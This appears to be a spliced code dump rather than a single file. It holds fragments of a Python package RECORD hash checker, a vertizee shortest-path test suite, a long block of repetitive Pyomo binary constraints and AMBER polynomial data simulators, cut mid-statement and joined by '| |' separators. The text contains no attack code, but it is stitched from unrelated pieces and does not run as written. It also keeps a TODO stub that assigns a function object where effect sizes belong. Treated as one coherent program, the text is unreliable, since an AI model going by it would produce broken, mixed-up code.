if record_path.startswith(base):
record_path = os.path.relpath(record_path, base)
writer.writerow((record_path, '', ''))
return record_path
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
base = os.path.dirname(self.path)
record_path = self.get_distinfo_file('RECORD')
for path, hash_value, size in self.list_installed_files():
if not os.path.isabs(path):
path = os.path.join(base, path)
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
elif os.path.isfile(path):
actual_size = str(os.path.getsize(path))
if size and actual_size != size:
mismatches.append((path, 'size', size, actual_size))
elif hash_value:
if '=' in hash_value:
hasher = hash_value.split('=', 1)[0]
else:
hasher = None
with open(path, 'rb') as f:
actual_hash = self.get_hash(f.read(), hasher)
if actual_hash != hash_value:
mismatches.append((path, 'hash', | |
<reponame>cpeisert/vertizee<filename>vertizee/algorithms/paths/tests/test_single_source_shortest_paths.py
# Copyright 2020 The Vertizee Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for algorithms that solve the single-source-shortest-paths problem."""
# pylint: disable=no-self-use
# pylint: disable=missing-function-docstring
import timeit
from typing import cast, Optional
import pytest
from vertizee import NegativeWeightCycle
from vertizee.algorithms.algo_utils.path_utils import reconstruct_path, ShortestPath
from vertizee.algorithms.paths.single_source import (
bellman_ford,
dijkstra,
dijkstra_fibonacci,
shortest_paths,
breadth_first_search_shortest_paths,
)
from vertizee.classes.data_structures.vertex_dict import VertexDict
from vertizee.classes.edge import Attributes, MultiEdgeBase
from vertizee.classes.graph import DiGraph, MultiDiGraph, MultiGraph
from vertizee.classes.vertex import DiVertex, MultiDiVertex, MultiVertex, V
class TestBellmanFord:
"""Tests for Bellman-Ford algorithm."""
def test_bellman_ford_default_edge_weight(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 2),
("t", "x", 1),
("x", "z", 4),
("y", "t", 3),
("y", "x", 9),
("y", "z", 2),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 8, "Length of path s ~> t should be 8."
assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
def test_bellman_ford_negative_edge_weights(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", -6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", -3),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 10, "Length of path s ~> t should be 10."
assert path_dict["x"].length == 7, "Length of path s ~> x should be 7."
assert path_dict["y"].length == 4, "Length of path s ~> y should be 4."
assert path_dict["z"].length == 1, "Length of path s ~> z should be 1."
def test_bellman_ford_path_reconstruction(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", -6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", -3),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s", save_paths=True)
assert path_dict["t"].path() == ["s", "t"], "Path s ~> t should be [s, t]."
assert path_dict["x"].path() == [
"s",
"t",
"y",
"z",
"x",
], "Path s ~> x should be [s, t, y, z, x]."
assert path_dict["z"].path() == ["s", "t", "y", "z"], "Path s ~> z should be [s, t, y, z]."
path_s_t = reconstruct_path("s", "t", path_dict)
assert path_s_t == path_dict["t"].path(), "Algorithm path should match reconstructed path."
path_s_x = reconstruct_path("s", "x", path_dict)
assert path_s_x == path_dict["x"].path(), "Algorithm path should match reconstructed path."
path_s_z = reconstruct_path("s", "z", path_dict)
assert path_s_z == path_dict["z"].path(), "Algorithm path should match reconstructed path."
def test_bellman_ford_reverse_graph(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", -6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", -3),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = bellman_ford(g, "s", reverse_graph=True)
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == -2, "Length of path s ~> t should be -2."
assert path_dict["x"].length == 11, "Length of path s ~> x should be 11."
assert path_dict["y"].length == 4, "Length of path s ~> y should be 4."
assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
def test_bellman_ford_negative_weight_cycle(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", -6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", -3),
("z", "s", -2),
("z", "x", 6),
]
)
with pytest.raises(NegativeWeightCycle):
bellman_ford(g, "s")
def test_bellman_ford_undirected_negative_weight_cycle(self) -> None:
g = MultiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", -6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", -3),
("z", "s", 7),
("z", "x", 6),
]
)
with pytest.raises(NegativeWeightCycle):
bellman_ford(g, "s")
def test_bellman_ford_undirected(self) -> None:
g = MultiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 6),
("t", "x", 1),
("x", "z", 4),
("y", "t", 8),
("y", "x", 4),
("y", "z", 3),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[MultiVertex]] = bellman_ford(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 10, "Length of path s ~> t should be 10."
assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
class TestBreadthFirstSearchShortestPaths:
"""Tests for shortest-paths unweighted using breadth-first search."""
def test_breadth_first_search_shortest_paths(self) -> None:
g = DiGraph(
[
("s", "t"),
("s", "y"),
("t", "y"),
("t", "x"),
("x", "z"),
("y", "t"),
("y", "x"),
("y", "z"),
("z", "s"),
("z", "x"),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = breadth_first_search_shortest_paths(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 1, "Length of path s ~> t should be 1."
assert path_dict["x"].length == 2, "Length of path s ~> x should be 2."
assert path_dict["y"].length == 1, "Length of path s ~> y should be 1."
assert path_dict["z"].length == 2, "Length of path s ~> z should be 2."
class TestDijkstra:
"""Tests for Dijkstra's algorithm."""
def test_dijkstra_default_edge_weight(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 2),
("t", "x", 1),
("x", "z", 4),
("y", "t", 3),
("y", "x", 9),
("y", "z", 2),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = dijkstra(g, "s")
assert len(path_dict) == 5, "Shortest path_dict dictionary should have length equal to |V|."
assert path_dict["s"].length == 0, "Length of s path should be 0."
assert path_dict["t"].length == 8, "Length of path s ~> t should be 8."
assert path_dict["x"].length == 9, "Length of path s ~> x should be 9."
assert path_dict["y"].length == 5, "Length of path s ~> y should be 5."
assert path_dict["z"].length == 7, "Length of path s ~> z should be 7."
def test_dijkstra_path_reconstruction(self) -> None:
g = DiGraph(
[
("s", "t", 10),
("s", "y", 5),
("t", "y", 2),
("t", "x", 1),
("x", "z", 4),
("y", "t", 3),
("y", "x", 9),
("y", "z", 2),
("z", "s", 7),
("z", "x", 6),
]
)
path_dict: VertexDict[ShortestPath[DiVertex]] = dijkstra(g, "s", save_paths=True)
assert path_dict["t"].path() == ["s", "y", "t"], "Path s ~> t should be [s, y, t]."
assert path_dict["x"].path() == ["s", "y", "t", "x"], "Path s ~> x should be [s, y, t, x]."
assert path_dict["z"].path() == ["s", "y", "z"], "Path s ~> z should be [s, y, z]."
path_s_t = reconstruct_path("s", "t", path_dict)
assert path_s_t == path_dict["t"].path(), "Algorithm path should match reconstructed path."
path_s_x = reconstruct_path("s", "x", path_dict)
assert path_s_x == path_dict["x"].path(), "Algorithm path should match reconstructed path."
path_s_z = reconstruct_path("s", "z", path_dict)
assert path_s_z == path_dict["z"].path(), "Algorithm path should match reconstructed path."
def test_dijkstra_edge_attr_weights(self) -> None:
WEIGHT = "weight_key"
g = DiGraph(
[
("s", "t"),
("s", "y"),
("t", "y"),
("t", "x"),
("x", "z"),
("y", "t"),
("y", "x"),
("y", "z"),
("z", "s"),
("z", "x"),
]
)
g.get_edge("s", "t")[WEIGHT] = 10
g.get_edge("s", "y")[WEIGHT] = 5
g.get_edge("t", "y")[WEIGHT] | |
= Constraint(expr= m.b618 + m.b621 <= 1)
m.c1544 = Constraint(expr= m.b619 + m.b621 <= 1)
m.c1545 = Constraint(expr= m.b620 + m.b621 <= 1)
m.c1546 = Constraint(expr= m.b622 + m.b623 <= 1)
m.c1547 = Constraint(expr= m.b622 + m.b624 <= 1)
m.c1548 = Constraint(expr= m.b622 + m.b625 <= 1)
m.c1549 = Constraint(expr= m.b622 + m.b623 <= 1)
m.c1550 = Constraint(expr= m.b623 + m.b624 <= 1)
m.c1551 = Constraint(expr= m.b623 + m.b625 <= 1)
m.c1552 = Constraint(expr= m.b622 + m.b624 <= 1)
m.c1553 = Constraint(expr= m.b623 + m.b624 <= 1)
m.c1554 = Constraint(expr= m.b624 + m.b625 <= 1)
m.c1555 = Constraint(expr= m.b622 + m.b625 <= 1)
m.c1556 = Constraint(expr= m.b623 + m.b625 <= 1)
m.c1557 = Constraint(expr= m.b624 + m.b625 <= 1)
m.c1558 = Constraint(expr= m.b626 + m.b627 <= 1)
m.c1559 = Constraint(expr= m.b626 + m.b628 <= 1)
m.c1560 = Constraint(expr= m.b626 + m.b629 <= 1)
m.c1561 = Constraint(expr= m.b626 + m.b627 <= 1)
m.c1562 = Constraint(expr= m.b627 + m.b628 <= 1)
m.c1563 = Constraint(expr= m.b627 + m.b629 <= 1)
m.c1564 = Constraint(expr= m.b626 + m.b628 <= 1)
m.c1565 = Constraint(expr= m.b627 + m.b628 <= 1)
m.c1566 = Constraint(expr= m.b628 + m.b629 <= 1)
m.c1567 = Constraint(expr= m.b626 + m.b629 <= 1)
m.c1568 = Constraint(expr= m.b627 + m.b629 <= 1)
m.c1569 = Constraint(expr= m.b628 + m.b629 <= 1)
m.c1570 = Constraint(expr= m.b630 + m.b631 <= 1)
m.c1571 = Constraint(expr= m.b630 + m.b632 <= 1)
m.c1572 = Constraint(expr= m.b630 + m.b633 <= 1)
m.c1573 = Constraint(expr= m.b630 + m.b631 <= 1)
m.c1574 = Constraint(expr= m.b631 + m.b632 <= 1)
m.c1575 = Constraint(expr= m.b631 + m.b633 <= 1)
m.c1576 = Constraint(expr= m.b630 + m.b632 <= 1)
m.c1577 = Constraint(expr= m.b631 + m.b632 <= 1)
m.c1578 = Constraint(expr= m.b632 + m.b633 <= 1)
m.c1579 = Constraint(expr= m.b630 + m.b633 <= 1)
m.c1580 = Constraint(expr= m.b631 + m.b633 <= 1)
m.c1581 = Constraint(expr= m.b632 + m.b633 <= 1)
m.c1582 = Constraint(expr= m.b634 + m.b635 <= 1)
m.c1583 = Constraint(expr= m.b634 + m.b636 <= 1)
m.c1584 = Constraint(expr= m.b634 + m.b637 <= 1)
m.c1585 = Constraint(expr= m.b634 + m.b635 <= 1)
m.c1586 = Constraint(expr= m.b635 + m.b636 <= 1)
m.c1587 = Constraint(expr= m.b635 + m.b637 <= 1)
m.c1588 = Constraint(expr= m.b634 + m.b636 <= 1)
m.c1589 = Constraint(expr= m.b635 + m.b636 <= 1)
m.c1590 = Constraint(expr= m.b636 + m.b637 <= 1)
m.c1591 = Constraint(expr= m.b634 + m.b637 <= 1)
m.c1592 = Constraint(expr= m.b635 + m.b637 <= 1)
m.c1593 = Constraint(expr= m.b636 + m.b637 <= 1)
m.c1594 = Constraint(expr= m.b638 + m.b639 <= 1)
m.c1595 = Constraint(expr= m.b638 + m.b640 <= 1)
m.c1596 = Constraint(expr= m.b638 + m.b641 <= 1)
m.c1597 = Constraint(expr= m.b638 + m.b639 <= 1)
m.c1598 = Constraint(expr= m.b639 + m.b640 <= 1)
m.c1599 = Constraint(expr= m.b639 + m.b641 <= 1)
m.c1600 = Constraint(expr= m.b638 + m.b640 <= 1)
m.c1601 = Constraint(expr= m.b639 + m.b640 <= 1)
m.c1602 = Constraint(expr= m.b640 + m.b641 <= 1)
m.c1603 = Constraint(expr= m.b638 + m.b641 <= 1)
m.c1604 = Constraint(expr= m.b639 + m.b641 <= 1)
m.c1605 = Constraint(expr= m.b640 + m.b641 <= 1)
m.c1606 = Constraint(expr= m.b642 + m.b643 <= 1)
m.c1607 = Constraint(expr= m.b642 + m.b644 <= 1)
m.c1608 = Constraint(expr= m.b642 + m.b645 <= 1)
m.c1609 = Constraint(expr= m.b642 + m.b643 <= 1)
m.c1610 = Constraint(expr= m.b643 + m.b644 <= 1)
m.c1611 = Constraint(expr= m.b643 + m.b645 <= 1)
m.c1612 = Constraint(expr= m.b642 + m.b644 <= 1)
m.c1613 = Constraint(expr= m.b643 + m.b644 <= 1)
m.c1614 = Constraint(expr= m.b644 + m.b645 <= 1)
m.c1615 = Constraint(expr= m.b642 + m.b645 <= 1)
m.c1616 = Constraint(expr= m.b643 + m.b645 <= 1)
m.c1617 = Constraint(expr= m.b644 + m.b645 <= 1)
m.c1618 = Constraint(expr= m.b646 + m.b647 <= 1)
m.c1619 = Constraint(expr= m.b646 + m.b648 <= 1)
m.c1620 = Constraint(expr= m.b646 + m.b649 <= 1)
m.c1621 = Constraint(expr= m.b646 + m.b647 <= 1)
m.c1622 = Constraint(expr= m.b647 + m.b648 <= 1)
m.c1623 = Constraint(expr= m.b647 + m.b649 <= 1)
m.c1624 = Constraint(expr= m.b646 + m.b648 <= 1)
m.c1625 = Constraint(expr= m.b647 + m.b648 <= 1)
m.c1626 = Constraint(expr= m.b648 + m.b649 <= 1)
m.c1627 = Constraint(expr= m.b646 + m.b649 <= 1)
m.c1628 = Constraint(expr= m.b647 + m.b649 <= 1)
m.c1629 = Constraint(expr= m.b648 + m.b649 <= 1)
m.c1630 = Constraint(expr= m.b650 + m.b651 <= 1)
m.c1631 = Constraint(expr= m.b650 + m.b652 <= 1)
m.c1632 = Constraint(expr= m.b650 + m.b653 <= 1)
m.c1633 = Constraint(expr= m.b650 + m.b651 <= 1)
m.c1634 = Constraint(expr= m.b651 + m.b652 <= 1)
m.c1635 = Constraint(expr= m.b651 + m.b653 <= 1)
m.c1636 = Constraint(expr= m.b650 + m.b652 <= 1)
m.c1637 = Constraint(expr= m.b651 + m.b652 <= 1)
m.c1638 = Constraint(expr= m.b652 + m.b653 <= 1)
m.c1639 = Constraint(expr= m.b650 + m.b653 <= 1)
m.c1640 = Constraint(expr= m.b651 + m.b653 <= 1)
m.c1641 = Constraint(expr= m.b652 + m.b653 <= 1)
m.c1642 = Constraint(expr= m.b654 + m.b655 <= 1)
m.c1643 = Constraint(expr= m.b654 + m.b656 <= 1)
m.c1644 = Constraint(expr= m.b654 + m.b657 <= 1)
m.c1645 = Constraint(expr= m.b654 + m.b655 <= 1)
m.c1646 = Constraint(expr= m.b655 + m.b656 <= 1)
m.c1647 = Constraint(expr= m.b655 + m.b657 <= 1)
m.c1648 = Constraint(expr= m.b654 + m.b656 <= 1)
m.c1649 = Constraint(expr= m.b655 + m.b656 <= 1)
m.c1650 = Constraint(expr= m.b656 + m.b657 <= 1)
m.c1651 = Constraint(expr= m.b654 + m.b657 <= 1)
m.c1652 = Constraint(expr= m.b655 + m.b657 <= 1)
m.c1653 = Constraint(expr= m.b656 + m.b657 <= 1)
m.c1654 = Constraint(expr= m.b658 + m.b659 <= 1)
m.c1655 = Constraint(expr= m.b658 + m.b660 <= 1)
m.c1656 = Constraint(expr= m.b658 + m.b661 <= 1)
m.c1657 = Constraint(expr= m.b658 + m.b659 <= 1)
m.c1658 = Constraint(expr= m.b659 + m.b660 <= 1)
m.c1659 = Constraint(expr= m.b659 + m.b661 <= 1)
m.c1660 = Constraint(expr= m.b658 + m.b660 <= 1)
m.c1661 = Constraint(expr= m.b659 + m.b660 <= 1)
m.c1662 = Constraint(expr= m.b660 + m.b661 <= 1)
m.c1663 = Constraint(expr= m.b658 + m.b661 <= 1)
m.c1664 = Constraint(expr= m.b659 + m.b661 <= 1)
m.c1665 = Constraint(expr= m.b660 + m.b661 <= 1)
m.c1666 = Constraint(expr= m.b662 + m.b663 <= 1)
m.c1667 = Constraint(expr= m.b662 + m.b664 <= 1)
m.c1668 = Constraint(expr= m.b662 + m.b665 <= 1)
m.c1669 = Constraint(expr= m.b662 + m.b663 <= 1)
m.c1670 = Constraint(expr= m.b663 + m.b664 <= 1)
m.c1671 = Constraint(expr= m.b663 + m.b665 <= 1)
m.c1672 = Constraint(expr= m.b662 + m.b664 <= 1)
m.c1673 = Constraint(expr= m.b663 + m.b664 <= 1)
m.c1674 = Constraint(expr= m.b664 + m.b665 <= 1)
m.c1675 = Constraint(expr= m.b662 + m.b665 <= 1)
m.c1676 = Constraint(expr= m.b663 + m.b665 <= 1)
m.c1677 = Constraint(expr= m.b664 + m.b665 <= 1)
m.c1678 = Constraint(expr= m.b666 + m.b667 <= 1)
m.c1679 = Constraint(expr= m.b666 + m.b668 <= 1)
m.c1680 = Constraint(expr= m.b666 + m.b669 <= 1)
m.c1681 = Constraint(expr= m.b666 + m.b667 <= 1)
m.c1682 = Constraint(expr= m.b667 + m.b668 <= 1)
m.c1683 = Constraint(expr= m.b667 + m.b669 <= 1)
m.c1684 = Constraint(expr= m.b666 + m.b668 <= 1)
m.c1685 = Constraint(expr= m.b667 + m.b668 <= 1)
m.c1686 = Constraint(expr= m.b668 + m.b669 <= 1)
m.c1687 = Constraint(expr= m.b666 + m.b669 <= 1)
m.c1688 = Constraint(expr= m.b667 + m.b669 <= 1)
m.c1689 = Constraint(expr= m.b668 + m.b669 <= 1)
m.c1690 = Constraint(expr= m.b670 + m.b671 <= 1)
m.c1691 = Constraint(expr= m.b670 + m.b672 <= 1)
m.c1692 = Constraint(expr= m.b670 + m.b673 <= 1)
m.c1693 = Constraint(expr= m.b670 + m.b671 <= 1)
m.c1694 = Constraint(expr= m.b671 + m.b672 <= 1)
m.c1695 = Constraint(expr= m.b671 + m.b673 <= 1)
m.c1696 = Constraint(expr= m.b670 + m.b672 <= 1)
m.c1697 = Constraint(expr= m.b671 + m.b672 <= 1)
m.c1698 = Constraint(expr= m.b672 + m.b673 <= 1)
m.c1699 = Constraint(expr= m.b670 + m.b673 <= 1)
m.c1700 = Constraint(expr= m.b671 + m.b673 <= 1)
m.c1701 = Constraint(expr= m.b672 + m.b673 <= 1)
m.c1702 = Constraint(expr= m.b674 + m.b675 <= 1)
m.c1703 = Constraint(expr= m.b674 + m.b676 <= 1)
m.c1704 = Constraint(expr= m.b674 + m.b677 <= 1)
m.c1705 = Constraint(expr= m.b674 + m.b675 <= 1)
m.c1706 = Constraint(expr= m.b675 + m.b676 <= 1)
m.c1707 = Constraint(expr= m.b675 + m.b677 <= 1)
m.c1708 = Constraint(expr= m.b674 + m.b676 <= 1)
m.c1709 = Constraint(expr= m.b675 + m.b676 <= 1)
m.c1710 = Constraint(expr= m.b676 + m.b677 <= 1)
m.c1711 = Constraint(expr= m.b674 + m.b677 <= 1)
m.c1712 = Constraint(expr= m.b675 + m.b677 <= 1)
m.c1713 = Constraint(expr= m.b676 + m.b677 <= 1)
m.c1714 = Constraint(expr= m.b678 + m.b679 <= 1)
m.c1715 = Constraint(expr= m.b678 + m.b680 <= 1)
m.c1716 = Constraint(expr= m.b678 + m.b681 <= 1)
m.c1717 = Constraint(expr= m.b678 + m.b679 <= 1)
m.c1718 = Constraint(expr= m.b679 + m.b680 <= 1)
m.c1719 = Constraint(expr= m.b679 + m.b681 <= 1)
m.c1720 = Constraint(expr= m.b678 + m.b680 <= 1)
m.c1721 = Constraint(expr= m.b679 + m.b680 <= 1)
m.c1722 = Constraint(expr= m.b680 + m.b681 <= 1)
m.c1723 = Constraint(expr= m.b678 + m.b681 <= 1)
m.c1724 = Constraint(expr= m.b679 + m.b681 <= 1)
m.c1725 = Constraint(expr= m.b680 + m.b681 <= | |
<filename>AMBER/amber/utils/simulator.py
from __future__ import print_function
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
from sklearn.preprocessing import PolynomialFeatures
class BaseSimulator:
def __init__(self, n, p, *args, **kwargs):
"""
Args:
n:
p:
*args:
**kwargs:
"""
self.n = n
self.p = p
def sample_effect(self):
pass
def sample_data(self):
pass
def get_ground_truth(self, X):
pass
class Simulator(BaseSimulator):
def __init__(self, n, p, beta_a, beta_i, noise_var=1.,
discretized=False, *args, **kwargs):
"""
Args:
n:
p:
beta_a:
beta_i:
noise_var:
discretized:
*args:
**kwargs:
"""
self.n = n
self.p = p
self.beta_a = np.array(beta_a).astype('float32')
self.beta_i = np.array(beta_i).astype('float32')
self.noise_var = noise_var
self.discretized = discretized
def sample_effect(self, drop_a, drop_i):
"""TODO: random sample effect sizes
:param drop_a: probability of masking of additive
:param drop_i: prob. for masking of interaction
"""
self.beta_a = np.random.normal
self.beta_i = np.random.normal
def sample_data(self):
"""
:rtype (X,y): a tuple of X and y
"""
if self.discretized:
X = np.array(np.random.randint(low=0, high=3, size=self.n * self.p)).reshape(self.n, self.p).astype(
'float32')
else:
X = np.array(np.random.uniform(low=0, high=3, size=self.n * self.p)).reshape(self.n, self.p).astype(
'float32')
X_s = PolynomialFeatures(2, interaction_only=False, include_bias=False).fit_transform(X)
beta = np.concatenate([self.beta_a, self.beta_i])
y = X_s.dot(beta) + np.random.normal(loc=0, scale=np.sqrt(self.noise_var), size=self.n)
return X, y
def get_ground_truth(self, X):
X_s = PolynomialFeatures(2, interaction_only=False, include_bias=False).fit_transform(X)
beta = np.concatenate([self.beta_a, self.beta_i])
return X_s.dot(beta)
class HigherOrderSimulator(BaseSimulator):
def __init__(self,
n,
p,
noise_var=0.1,
x_var=1.,
degree=3,
with_input_blocks=False,
drop_a=0.2,
drop_i=0.8,
discretize_beta=False,
discretize_x=False,
*args, **kwargs):
"""
A vanilla simulator that simulates an arbitrary high-order Polynomial,
for benchmarking interaction effects
Args:
n:
p:
noise_var:
degree:
with_input_blocks:
drop_a:
drop_i:
discretize_beta:
discretize_x:
max_x:
"""
self.n = n
self.p = p
self.with_input_blocks = with_input_blocks
self.noise_var = noise_var
self.x_var = x_var
self.degree = degree
self.polynomial_fitter = PolynomialFeatures(degree=degree, interaction_only=False, include_bias=False)
self.polynomial_fitter.fit(np.zeros((self.n, self.p)))
self.beta_a = np.zeros(p)
self.beta_i = np.zeros(self.polynomial_fitter.n_output_features_ - p)
self.powers_i_ = self.polynomial_fitter.powers_[p:]
self.drop_a = drop_a
self.drop_i = drop_i
if discretize_beta:
self.beta_rng = lambda p: np.random.choice(range(-1, 2), p)
else:
self.beta_rng = lambda p: np.random.uniform(-1, 1, p)
if discretize_x:
self.x_rng = lambda n: np.random.poisson(x_var, n)
else:
self.x_rng = lambda n: np.random.normal(0, np.sqrt(x_var), n)
self.is_beta_built = False
def sample_effect(self):
# additive
a_idx = np.random.choice(self.p, int(np.ceil(self.p * (1 - self.drop_a))), replace=False)
self.beta_a[a_idx] = self.beta_rng(len(a_idx))
# interaction
i_idx = np.random.choice(len(self.beta_i), int(np.ceil(len(self.beta_i) * (1 - self.drop_i))), replace=False)
self.beta_i[i_idx] = self.beta_rng(len(i_idx))
self.is_beta_built = True
def set_effect(self, beta_a, beta_i):
self.beta_a = beta_a
self.beta_i = beta_i
self.is_beta_built = True
def sample_data(self, N=None, *args, **kwargs):
N = self.n if N is None else N
X = self.x_rng(N * self.p).reshape(N, self.p)
X_s = self.polynomial_fitter.transform(X)
if not self.is_beta_built:
self.sample_effect()
beta = np.concatenate([self.beta_a, self.beta_i])
y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
if self.with_input_blocks:
X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
return X, y
def get_ground_truth(self, X):
if self.with_input_blocks:
X_ = np.concatenate(X, axis=1)
else:
X_ = X
X_s = self.polynomial_fitter.transform(X_)
beta = np.concatenate([self.beta_a, self.beta_i])
return X_s.dot(beta)
def get_nonzero_powers(self):
if not self.is_beta_built:
self.sample_effect()
self.is_beta_built = True
return self.powers_i_[np.where(self.beta_i != 0)]
class CorrelatedDataSimulator(HigherOrderSimulator):
def __init__(self,
n,
p,
noise_var=0.1,
data_cov_matrix=None,
degree=3,
with_input_blocks=False,
*args, **kwargs):
"""
Simulator for correlated Xs, inherited from `HigherOrderSimulator`
The correlated data is achieved by sampling from a multivariate
normal distribution
Args:
*args:
**kwargs:
Returns:
"""
super().__init__(
n=n,
p=p,
noise_var=noise_var,
degree=degree,
with_input_blocks=with_input_blocks,
*args, **kwargs)
self.x_rng = self._get_data_rng(data_cov_matrix)
def _get_data_rng(self, data_cov_matrix):
from numpy.random import multivariate_normal as mvn
mu = np.zeros(self.p)
cov = np.array(data_cov_matrix)
assert len(mu) == cov.shape[0] == cov.shape[1]
rng = lambda x: mvn(mu, cov, size=x)
return rng
def sample_data(self, N=None, *args, **kwargs):
N = self.n if N is None else N
X = self.x_rng(N).reshape(N, self.p)
X_s = self.polynomial_fitter.transform(X)
if not self.is_beta_built:
self.sample_effect()
self.is_beta_built = True
beta = np.concatenate([self.beta_a, self.beta_i])
y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
if self.with_input_blocks:
X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
return X, y
class HiddenStateSimulator(HigherOrderSimulator):
def __init__(self, n, x_index, h_index=None, degree=2, interaction_strength=None, *args, **kwargs):
"""
Args:
n:
x_index:
h_index:
degree:
interaction_strength: interaction strength defines drop_i as well as beta_rng for interaction terms
effect sizes
*args:
**kwargs:
"""
if "noise_var" in kwargs:
assert kwargs['noise_var'] == 0, "HiddenStateSimulator must set Noise_var=0; got %s" % kwargs['noise_var']
self.x_index = x_index
self.x_len = len(self.x_index)
self.interaction_strength = interaction_strength
self.h_index = h_index if h_index is not None else []
self.h_len = len(self.h_index)
# the order for concat is x + h
p = self.x_len + self.h_len
if interaction_strength is None:
super().__init__(n=n, p=p, degree=degree, noise_var=0, drop_a=0, *args, **kwargs)
else:
super().__init__(n=n, p=p, degree=degree, noise_var=0, drop_a=0, drop_i=1 - interaction_strength, *args,
**kwargs)
# overwrite
self.polynomial_fitter = PolynomialFeatures(degree=degree, interaction_only=True, include_bias=False)
self.polynomial_fitter.fit(np.zeros((self.n, self.p)))
self.beta_a = np.zeros(p)
self.beta_i = np.zeros(self.polynomial_fitter.n_output_features_ - p)
self.powers_i_ = self.polynomial_fitter.powers_[p:]
if self.interaction_strength is None:
self.beta_i_rng = self.beta_rng
else:
# normal distribution has 95% prob. of falling within mu +/- 2*sigma
self.beta_i_rng = lambda n: np.sign(np.random.uniform(-1, 1, n)) * np.random.uniform(
self.interaction_strength, 0.1, n)
def sample_effect(self):
# additive
a_idx = np.random.choice(self.p, int(np.ceil(self.p * (1 - self.drop_a))), replace=False)
self.beta_a[a_idx] = self.beta_rng(len(a_idx))
# interaction
i_idx = np.random.choice(len(self.beta_i), int(np.ceil(len(self.beta_i) * (1 - self.drop_i))), replace=False)
self.beta_i[i_idx] = self.beta_i_rng(len(i_idx))
self.is_beta_built = True
def sample_data(self, N=None, hs=None, *args, **kwargs):
assert self.h_len == 0 or hs is not None, "If h_index is not empty, must parse `hs` in argument"
N = self.n if N is None else N
X = self.x_rng(N * self.x_len).reshape(N, self.x_len)
if hs is not None:
h = hs[:, self.h_index]
X = np.concatenate([X, h], axis=1)
X_s = self.polynomial_fitter.transform(X)
if not self.is_beta_built:
self.sample_effect()
beta = np.concatenate([self.beta_a, self.beta_i], )
y = X_s.dot(beta) + np.random.normal(0, np.sqrt(self.noise_var), N)
if self.with_input_blocks:
X = [X[:, i] if len(X.shape) > 2 else X[:, i].reshape(X.shape[0], 1) for i in range(X.shape[1])]
return X, y
class _OntologyPolynomial:
def __init__(self, ontology_simulator, n, noise_var=0.1):
self.ontology_simulator = ontology_simulator
self.n = n
self.hidden_state_simulators = []
self.hidden_state_nodes = [n for n in ontology_simulator.T.nodes if type(n) is str and n.startswith('h')]
self.num_nodes = len(ontology_simulator.G)
self.noise_var = noise_var
